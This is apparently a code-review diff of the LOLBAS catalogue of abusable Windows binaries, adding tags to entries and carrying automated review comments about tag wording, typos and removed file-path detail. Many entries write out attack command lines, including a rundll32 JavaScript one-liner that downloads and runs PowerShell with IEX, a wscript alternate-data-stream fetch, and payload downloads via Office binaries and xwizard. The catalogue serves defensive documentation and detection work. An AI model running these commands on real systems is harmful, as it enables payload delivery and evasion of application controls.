- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml
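Review bot: the regsvcs Detection list points at `proc_creation_win_lolbin_regasm.yml`, the same Sigma rule linked from the regasm entry above; if that rule's selection matches only `regasm.exe`, this entry has no process-creation detection of its own despite the same `Execute: DLL` / `Input: Custom Format` tagging. Verify the rule's selection covers `regsvcs.exe` or link a regsvcs-specific rule while this file is being edited.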
@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
Usecase: Execute DLL from SMB share.
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
Usecase: Execute code from Internet
@ -53,6 +57,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe -sta {CLSID}
Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.
Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
@ -60,11 +66,11 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10 (and likely previous versions), Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rundll32.exe
|
||||
- Path: C:\Windows\SysWOW64\rundll32.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
|
||||
|
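Review bot: 'Execute: DLL' undersells the '-sta {CLSID}' entry, whose Description and Usecase say the payload can be a DLL or EXE COM server or ScriptletURL code; tag the other vectors too, or pick a broader value, so a search on the DLL tag alone does not return only part of what this entry covers.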
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Type: Compression
|
||||
- Command: tar -xf compressedfilename:ads
|
||||
Description: Decompress a compressed file from an alternate data stream (ADS).
|
||||
Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism
|
||||
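Review bot: the tag key 'Type' breaks the vocabulary used elsewhere in this change, where keys are verbs naming what the binary does with the value ('Execute: DLL', 'Download: INetCache', 'Input: INF'). 'Type: Compression' says what tar is rather than what the entry does; consider a key from the same family (an 'Input' tag, or an ADS-oriented tag for this T1564.004 entry) so tags stay filterable across binaries.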
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Type: Compression
|
||||
- Command: tar -xf \\host1\archive.tar
|
||||
Description: Extracts archive.tar from the remote (internal) host (host1) to the current host.
|
||||
Usecase: Copy files
|
||||
@ -25,6 +29,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Type: Compression
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\tar.exe
|
||||
- Path: C:\Windows\SysWOW64\tar.exe
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 7, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
|
||||
Description: Binary file used by .NET to compile Visual Basic code to an executable.
|
||||
Usecase: Compile attacker code on system. Bypass defensive counter measures.
|
||||
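Review bot: 'Execute: WSH' does not fit vbc.exe: the Description on the following command says it is the .NET compiler for Visual Basic code and the entries carry MitreID T1127 (Trusted Developer Utilities Proxy Execution), whereas WSH names the Windows Script Host that runs VBScript and JScript. A compile-oriented tag value would let defenders distinguish "compile an executable on the host" from script-host execution; the same value is reused in the next hunk and should change with it.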
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 7, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
|
||||
@ -28,6 +32,4 @@ Detection:
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
|
||||
Acknowledgement:
|
||||
- Person: Lior Adar
|
||||
Handle:
|
||||
- Person: Hai Vaknin(Lux)
|
||||
Handle:
|
||||
|
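Review bot: both 'Handle:' keys under Acknowledgement are empty. If they are the two lines this hunk removes (the header shrinks from 6 to 4 lines), good; otherwise either fill them in or drop them so the YAML does not carry null values.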
@ -39,11 +39,11 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\wbem\wmic.exe
|
||||
- Path: C:\Windows\SysWOW64\wbem\wmic.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
|
||||
Description: Download and execute script stored in an alternate data stream
|
||||
Usecase: Execute hidden code to evade defensive counter measures
|
||||
@ -21,8 +23,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\wscript.exe
|
||||
- Path: C:\Windows\SysWOW64\wscript.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml
|
||||
|
@ -5,16 +5,16 @@ Author: 'David Middlehurst'
|
||||
Created: 2020-09-23
|
||||
Commands:
|
||||
- Command: wuauclt.exe /UpdateDeploymentProvider Full_Path_To_DLL /RunHandlerComServer
|
||||
Description: Full_Path_To_DLL would be the abosolute path to .DLL file and would execute code on attach.
|
||||
Description: Full_Path_To_DLL would be the absolute path to .DLL file and would execute code on attach.
|
||||
Usecase: Execute dll via attach/detach methods
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\wuauclt.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml
|
||||
|
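Review bot: the 'abosolute' fix is right, but the Description still reads awkwardly ("would be the absolute path to .DLL file and would execute code on attach"). Suggest "Full_Path_To_DLL is the absolute path to the .DLL; its code runs when the DLL is attached (DLL_PROCESS_ATTACH)", which also matches the Usecase's "attach/detach" wording.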
@ -19,12 +19,14 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
|
||||
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
|
||||
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
|
||||
Usecase: Download file from Internet
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\xwizard.exe
|
||||
- Path: C:\Windows\SysWOW64\xwizard.exe
|
||||
|
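Review bot: shortening the Description to "save it to INetCache" discards the concrete drop location (the two INetCache subfolders and the '<FILENAME>[1].<EXTENSION>' naming) that a responder uses to find the downloaded file; the new 'Download: INetCache' tag classifies the behaviour but does not preserve that detail. Keep the path in the Description (and fix the mixed '\' and '/' separators while there), or document the INetCache layout once in a place the tag can point to.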
@ -18,6 +18,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Input: INF
|
||||
- Command: rundll32.exe advpack.dll,RegisterOCX test.dll
|
||||
Description: Launch a DLL payload by calling the RegisterOCX function.
|
||||
Usecase: Load a DLL payload.
|
||||
@ -25,6 +27,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: rundll32.exe advpack.dll,RegisterOCX calc.exe
|
||||
Description: Launch an executable by calling the RegisterOCX function.
|
||||
Usecase: Run an executable payload.
|
||||
|
@ -25,6 +25,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
|
||||
Description: Launch an executable by calling the RegisterOCX function.
|
||||
Usecase: Run an executable payload.
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\scrobj.dll
|
||||
- Path: c:\windows\syswow64\scrobj.dll
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Input: INF
|
||||
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf
|
||||
Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
|
||||
Usecase: Load an executable payload.
|
||||
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Input: INF
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\setupapi.dll
|
||||
- Path: c:\windows\syswow64\setupapi.dll
|
||||
|
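Review bot: the second entry's 'OperatingSystem: Windows' is less specific than the 'Windows 10, Windows 11' given for the first entry in the same file; align them, or state why the second command applies more broadly, so the two entries do not disagree about platform coverage.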
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
|
||||
Description: Launch an executable by calling the ShellExec_RunDLL function.
|
||||
Usecase: Run an executable payload.
|
||||
|
@ -5,12 +5,14 @@ Author: Eral4m
|
||||
Created: 2021-01-06
|
||||
Commands:
|
||||
- Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe
|
||||
Description: Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<random>\payload[1].exe. Can also be used with entrypoint 'ImageView_FullscreenA'.
|
||||
Description: Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'.
|
||||
Usecase: Download file from remote location.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\shimgvw.dll
|
||||
- Path: c:\windows\syswow64\shimgvw.dll
|
||||
|
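Review bot: the removed Description text recorded that the file lands at '%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<random>\payload[1].exe', which is exactly the artifact a responder would search for; "download ... to INetCache" plus the 'Download: INetCache' tag loses the 'IE\<random>\' subfolder and the '[1]' naming. Keep the path, or at least the subfolder and naming pattern, in the Description.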
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Input: INF
|
||||
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
|
||||
Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
|
||||
Usecase: Load an executable payload.
|
||||
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Input: INF
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\syssetup.dll
|
||||
- Path: c:\windows\syswow64\syssetup.dll
|
||||
|
@ -21,8 +21,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\zipfldr.dll
|
||||
- Path: c:\windows\syswow64\zipfldr.dll
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
|
||||
Resources:
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
|
||||
Code_Sample:
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
|
||||
Code_Sample:
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
|
||||
Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
|
||||
Usecase: Local execution of managed code to bypass AppLocker.
|
||||
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe
|
||||
|
@ -28,8 +28,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml
|
||||
Resources:
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Command: bginfo.exe bginfo.bgi /popup /nolicprompt
|
||||
Description: Execute VBscript code that is referenced within the bginfo.bgi file.
|
||||
Usecase: Local execution of VBScript
|
||||
@ -18,12 +20,16 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
|
||||
Usecase: Remote execution of VBScript
|
||||
Description: Execute bginfo.exe from a WebDAV server.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
OperatingSystem: Windows
|
||||
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
|
||||
Usecase: Remote execution of VBScript
|
||||
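Review bot: in the second entry of this hunk 'Tags:' is inserted before 'OperatingSystem:' while every other entry in this change, including the first entry in this same hunk, places it after; move it so field order stays uniform. Separately, the hunk shows two entries with the identical Command '\\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt' and the same Usecase 'Remote execution of VBScript', which looks like a duplicated entry that should be collapsed rather than tagged twice.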
@ -32,6 +38,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
|
||||
Usecase: Remote execution of VBScript
|
||||
Description: This style of execution may not longer work due to patch.
|
||||
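Review bot: the Description in the trailing context, "This style of execution may not longer work due to patch", should read "may no longer work due to a patch", and naming the patch or the date it stopped working would make the entry actionable for detection prioritisation. This entry also lists Usecase before Description, the reverse of the field order used by the other entries.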
@ -39,6 +47,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
|
||||
Usecase: Remote execution of VBScript
|
||||
Description: This style of execution may not longer work due to patch.
|
||||
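Review bot: this hunk repeats the entry from the previous hunk verbatim (same Command '\\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt', same Usecase, same "may not longer work" Description), so the file carries one technique twice and now receives the same tag twice; de-duplicate before tagging.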
@ -46,10 +56,10 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
Full_Path:
|
||||
- Path: No fixed path
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1055
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: coregen.exe dummy_assembly_name
|
||||
Description: Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0).
|
||||
Usecase: Execute DLL code
|
||||
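Review bot: the Description in the trailing context has 'corgen.exe' where it means 'coregen.exe' (the binary named in the Command and in the Full_Path entries); since this file is being edited for tags anyway, fix the typo in the same change.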
@ -25,6 +27,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
|
||||
@ -42,8 +46,5 @@ Resources:
|
||||
- Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
|
||||
Acknowledgement:
|
||||
- Person: Nicky Tyrer
|
||||
Handle:
|
||||
- Person: Evan Pena
|
||||
Handle:
|
||||
- Person: Casey Erikson
|
||||
Handle:
|
||||
|
@ -6,11 +6,13 @@ Created: 2019-07-19
|
||||
Commands:
|
||||
- Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
|
||||
Description: Downloads payload from remote server
|
||||
Usecase: It will download a remote payload and place it in the cache folder
|
||||
Usecase: It will download a remote payload and place it in INetCache.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe
|
||||
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe
|
||||
|
@ -6,11 +6,13 @@ Created: 2022-07-24
|
||||
Commands:
|
||||
- Command: MsoHtmEd.exe https://example.com/payload
|
||||
Description: Downloads payload from remote server
|
||||
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
|
||||
Usecase: It will download a remote payload and place it in INetCache.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe
|
||||
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe
|
||||
|
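Review bot: the old Usecase gave a concrete example location ('%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE'); replacing it with "place it in INetCache" plus the 'Download: INetCache' tag leaves no path in the entry for a responder to check. Keep the example path, or define once where INetCache resolves on the listed Windows versions so the tag stays meaningful.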
@ -6,11 +6,13 @@ Created: 2022-08-02
|
||||
Commands:
|
||||
- Command: mspub.exe https://example.com/payload
|
||||
Description: Downloads payload from remote server
|
||||
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
|
||||
Usecase: It will download a remote payload and place it in INetCache.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe
|
||||
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe
|
||||
|
@ -6,11 +6,13 @@ Created: 2019-07-19
|
||||
Commands:
|
||||
- Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
|
||||
Description: Downloads payload from remote server
|
||||
Usecase: It will download a remote payload and place it in the cache folder
|
||||
Usecase: It will download a remote payload and place it in INetCache.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe
|
||||
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe
|
||||
|
@ -12,14 +12,18 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
|
||||
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: procdump.exe -md calc.dll foobar
|
||||
Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
|
||||
Usecase: Performs execution of unsigned DLL.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
|
||||
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: no default
|
||||
Detection:
|
||||
|
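Review bot: the trailing-period removal on 'OperatingSystem' is fine, but the Description of the '-md calc.dll foobar' command is hard to parse ("Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary"); suggest "Loads calc.dll and runs its DLL_PROCESS_ATTACH code; the process argument (foobar) is arbitrary".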
@ -18,6 +18,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Input: Custom Format
|
||||
Full_Path:
|
||||
- Path: no default
|
||||
Detection:
|
||||
|
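Review bot: 'Input: Custom Format' is not a usable tag value: the other 'Input:' tags in this change name a concrete format ('INF'), and "custom" tells a reader filtering by input type nothing about what file the binary consumes. Name the actual format, or the binary's own configuration file type, instead.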
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
|
||||
Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
|
||||
Usecase: Injection of locally stored DLL file into target process.
|
||||
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: no default
|
||||
Code_Sample:
|
||||
|
@ -6,11 +6,13 @@ Created: 2019-07-19
|
||||
Commands:
|
||||
- Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
|
||||
Description: Downloads payload from remote server
|
||||
Usecase: It will download a remote payload and place it in the cache folder
|
||||
Usecase: It will download a remote payload and place it in INetCache.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe
|
||||
@ -28,8 +30,6 @@ Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office12\winword.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office12\winword.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml
|
||||
- IOC: Suspicious Office application Internet/network traffic
|
||||
|
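Review bot: 'Full_Path' lists 'C:\Program Files\Microsoft Office\Office12\winword.exe' twice in this hunk. If the second copy is not one of the two lines the hunk removes, drop it; if it is, the removal deserves a mention in the commit message alongside the tag additions.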
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
